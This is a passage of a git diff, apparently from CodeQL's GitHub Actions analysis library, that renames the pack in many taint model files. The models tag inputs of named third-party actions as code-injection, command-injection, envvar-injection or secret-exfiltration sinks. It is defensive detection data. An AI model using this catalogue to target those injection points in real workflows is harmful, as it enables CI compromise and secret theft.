b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 8d68efb9247..26ff1b8d07c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml index 5687a9729fc..62ffad94493 100644 --- a/ql/lib/ext/manual/8398a7_action-slack.model.yml +++ b/ql/lib/ext/manual/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml index 2efaefb95b6..d09b5bf0085 100644 --- a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml +++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml index 74a0f43fd91..45a4441e5ca 100644 --- a/ql/lib/ext/manual/MeilCli_regex-match.model.yml +++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml index 87620afac70..2f38a258867 100644 --- a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml index ad7fb8a538c..ba894b15732 100644 --- a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml +++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml index e2009c88851..a29b008f6c2 100644 --- a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/WyriHaximus/github-action-files-in-commit diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml index cf23452f7a9..045e1177ae2 100644 --- a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml +++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml index 119b4b1d814..011f078ff68 100644 --- a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ab185508/file-type-finder diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml index edc9585b548..ea86e6f5ec7 100644 --- a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml +++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml index f02d8f5b180..3033719bc3b 100644 --- a/ql/lib/ext/manual/actions_github-script.model.yml +++ b/ql/lib/ext/manual/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml index 77df62717b0..f245519a061 100644 --- a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml index 8f14138168c..0116f070183 100644 --- a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml +++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml index abdcdd6d698..c272955c58e 100644 --- a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml index 86ce17a9a9b..5523b7c5067 100644 --- a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml index ecfdbfb98a0..8d49c5436e6 100644 --- a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml index ea7ab312528..d607aee0514 100644 --- a/ql/lib/ext/manual/anchore_sbom-action.model.yml +++ b/ql/lib/ext/manual/anchore_sbom-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml index 21ea405b32c..93bfef22269 100644 --- a/ql/lib/ext/manual/anchore_scan-action.model.yml +++ b/ql/lib/ext/manual/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml index 1e95a8c0273..84500597ce2 100644 --- a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml index 1ecba6ef1a1..3db7aa5db2c 100644 --- a/ql/lib/ext/manual/android-actions_setup-android.model.yml +++ b/ql/lib/ext/manual/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml index e3c9297cf23..ac01c86d587 100644 --- a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ankitjain28may/list-files-in-pr diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml index 5d7cb6e0b91..47411f7342a 100644 --- a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml index c489f8edc85..087045d86b4 100644 --- a/ql/lib/ext/manual/appleboy_ssh-action.model.yml +++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml index 26b2e2eb693..29276b6fdd4 100644 --- a/ql/lib/ext/manual/asdf-vm_actions.model.yml +++ b/ql/lib/ext/manual/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml index 99324837e75..db6c52b33fd 100644 --- a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml index cd827ffc2f8..d20d698c40d 100644 --- a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml index 64abc03a5fb..f0e4e6e31b1 100644 --- a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml index c14bc95c013..b15eff55336 100644 --- a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml +++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/AvraamMavridis/files-changed-action diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml index 63eb8b21249..f17f3c788b3 100644 --- a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml index 170ceb2f95c..ccdb64fd3f3 100644 --- a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml index dcf1de044aa..588c17bc76a 100644 --- a/ql/lib/ext/manual/azure_cli.model.yml +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index a2d08f93928..901c4cf461e 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml index 7d646dece69..8db78b6e9a8 100644 --- a/ql/lib/ext/manual/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/manual/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml index fb03722c16a..20a06102bbd 100644 --- a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml index a14748aead0..043610ab3a3 100644 --- a/ql/lib/ext/manual/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/manual/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml index 4caf23c8812..037b67993f3 100644 --- a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml index 1fa66b8ceb6..7483849b916 100644 --- a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml index f2fed75539b..8f5a15aa1e9 100644 --- a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml index 264c3f7b242..f18fd14a4a6 100644 --- a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml +++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml index dfaffaf87de..f3eabe2c17d 100644 --- a/ql/lib/ext/manual/cachix_cachix-action.model.yml +++ b/ql/lib/ext/manual/cachix_cachix-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml index 7bab09bca76..e1b34c67d49 100644 --- a/ql/lib/ext/manual/changesets_action.model.yml +++ b/ql/lib/ext/manual/changesets_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml index 86759ad40d5..9f212f145f6 100644 --- a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml index f00774d1c4a..49a39935544 100644 --- a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml +++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml index 65474ba343d..319f712a9bf 100644 --- a/ql/lib/ext/manual/coursier_cache-action.model.yml +++ b/ql/lib/ext/manual/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml index e3dd557084b..772a5d59e18 100644 --- a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml index f3cb32b612f..3d1366558fe 100644 --- a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml index 639ee965f42..3da214d62fe 100644 --- a/ql/lib/ext/manual/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/manual/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml index 40d03569c8d..37c6af1f99e 100644 --- a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml index ed20a562375..fecc9e5ce05 100644 --- a/ql/lib/ext/manual/cypress-io_github-action.model.yml +++ b/ql/lib/ext/manual/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml index 22725484ea4..34eac65cdc8 100644 --- a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml index d7839211e20..ba5de3c2470 100644 --- a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml index 3ff92757361..27a8ffae185 100644 --- a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml index 2e41b4f8eb5..b87f1862999 100644 --- a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml index 62ff29bc9f0..7ead429278e 100644 --- a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml index af4e15da03b..6b900caef36 100644 --- a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml index 2dbf4718714..cafdfada61b 100644 --- a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml @@ -1,6 +1,6 @@ 